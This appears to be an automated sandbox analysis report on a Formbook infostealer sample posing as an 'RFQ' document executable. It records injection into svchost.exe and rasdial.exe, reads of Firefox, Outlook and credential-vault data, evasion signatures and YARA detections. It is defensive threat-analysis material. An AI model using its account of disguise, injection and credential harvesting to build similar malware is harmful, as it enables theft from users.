            Source: 00000006.00000002.4003574545.0000000007920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2490399894.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3995129739.0000000004D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2490106320.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3994994966.0000000003430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2490739625.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3995137235.0000000004360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@11/10
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_006037B5 GetLastError,FormatMessageW,0_2_006037B5
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005F10BF AdjustTokenPrivileges,CloseHandle,0_2_005F10BF
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005F16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_005F16C3
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_006051CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006051CD
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0061A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0061A67C
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0060648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0060648E
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005942A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_005942A2
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeFile created: C:\Users\user\AppData\Local\Temp\autC3DD.tmpJump to behavior
            Source: RFQ STR-160-01.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rasdial.exe, 00000007.00000002.3990288886.00000000033A3000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3990288886.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2666655339.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2664274816.00000000033A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: RFQ STR-160-01.exeReversingLabs: Detection: 31%
            Source: RFQ STR-160-01.exeVirustotal: Detection: 29%
            Source: unknownProcess created: C:\Users\user\Desktop\RFQ STR-160-01.exe "C:\Users\user\Desktop\RFQ STR-160-01.exe"
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ STR-160-01.exe"
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ STR-160-01.exe"Jump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: RFQ STR-160-01.exeStatic file information: File size 1229312 > 1048576
            Source: RFQ STR-160-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: RFQ STR-160-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: RFQ STR-160-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: RFQ STR-160-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: RFQ STR-160-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: RFQ STR-160-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: RFQ STR-160-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MVaAnXtfZfwmI.exe, 00000006.00000000.2410689421.0000000000CDE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ STR-160-01.exe, 00000000.00000003.2139890971.0000000004130000.00000004.00001000.00020000.00000000.sdmp, RFQ STR-160-01.exe, 00000000.00000003.2140381370.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396171079.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393966388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490426907.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490426907.0000000003900000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2492881265.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996178534.000000000514E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996178534.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2490543910.0000000004C44000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000003.2457687676.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490320517.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MVaAnXtfZfwmI.exe, 00000006.00000003.2433859570.0000000000804000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ STR-160-01.exe, 00000000.00000003.2139890971.0000000004130000.00000004.00001000.00020000.00000000.sdmp, RFQ STR-160-01.exe, 00000000.00000003.2140381370.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2396171079.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393966388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490426907.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490426907.0000000003900000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000007.00000003.2492881265.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996178534.000000000514E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996178534.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2490543910.0000000004C44000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000003.2457687676.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490320517.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MVaAnXtfZfwmI.exe, 00000006.00000003.2433859570.0000000000804000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000054EC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3990288886.0000000003329000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2773015874.000000000EBFC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000054EC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3990288886.0000000003329000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2773015874.000000000EBFC000.00000004.80000000.00040000.00000000.sdmp
            Source: RFQ STR-160-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: RFQ STR-160-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: RFQ STR-160-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: RFQ STR-160-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: RFQ STR-160-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005942DE
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005B0A76 push ecx; ret 0_2_005B0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414833 push ss; retf 2_2_00414842
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041389F push FFFFFFA4h; ret 2_2_004138AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412100 push edi; iretd 2_2_00412101
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403110 push eax; ret 2_2_00403112
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A987 push ebp; ret 2_2_0040A99B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417CE3 push eax; ret 2_2_00417CE4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413FF7 push ss; retf 2_2_0041403C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417FAD push esp; iretd 2_2_00417FB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390225F pushad ; ret 2_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039027FA pushad ; ret 2_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390283D push eax; iretd 2_2_03902858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03901368 push eax; iretd 2_2_03901369
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_0795471E push ebp; ret 6_2_07954732
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_0795BE97 push edi; iretd 6_2_0795BE98
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_07953E96 push B7D34988h; ret 6_2_07953E9B
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_0795D636 push FFFFFFA4h; ret 6_2_0795D644
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_07961E44 push es; iretd 6_2_07961E49
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_0795E5CA push ss; retf 6_2_0795E5D9
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_07953C5A push ebp; ret 6_2_07953C13
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_07953BFB push ebp; ret 6_2_07953C13
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FE09AD push ecx; mov dword ptr [esp], ecx7_2_04FE09B6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0307078C push FFFFFFA4h; ret 7_2_0307079A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_03074BD0 push eax; ret 7_2_03074BD1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0306EFED push edi; iretd 7_2_0306EFEE
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_03074E9A push esp; iretd 7_2_03074EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_030812B6 pushad ; ret 7_2_030812F3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_03071720 push ss; retf 7_2_0307172F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_03079BBE push ss; ret 7_2_03079C63
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0306787F push ebp; ret 7_2_03067888
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005AF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005AF98E
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00621C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00621C41
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97685
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeAPI/Special instruction interceptor: Address: 1793224
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 9755Jump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeAPI coverage: 4.0 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rasdial.exeAPI coverage: 2.6 %
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe TID: 1320Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe TID: 1320Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 7004Thread sleep count: 217 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 7004Thread sleep time: -434000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 7004Thread sleep count: 9755 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 7004Thread sleep time: -19510000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_005FDBBE
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005CC2A2 FindFirstFileExW,0_2_005CC2A2
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_006068EE FindFirstFileW,FindClose,0_2_006068EE
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0060698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0060698F
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005FD076
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005FD3A9
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00609642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00609642
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0060979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0060979D
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00609B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00609B2B
